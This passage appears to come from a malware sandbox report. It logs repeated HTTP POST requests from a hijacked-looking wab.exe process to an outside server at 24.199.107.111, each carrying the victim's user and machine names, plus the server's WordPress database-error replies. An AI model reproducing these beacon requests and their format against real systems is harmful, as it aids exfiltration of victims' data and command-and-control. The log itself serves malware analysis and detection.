                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:28.543041945 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:28.543052912 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              29192.168.2.54974924.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:28.852627039 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:29.015738010 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:29.838737011 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:28 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:29.838764906 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:29.838777065 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              30192.168.2.54975024.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:30.148760080 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:30.313215017 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:31.111125946 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:30 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:31.111160994 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:31.111172915 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              31192.168.2.54975124.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:31.417776108 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:31.580364943 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:32.360512018 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:31 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:32.360532045 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:32.360544920 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              32192.168.2.54975224.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:32.674566984 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:32.838032961 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:33.615581036 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:32 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
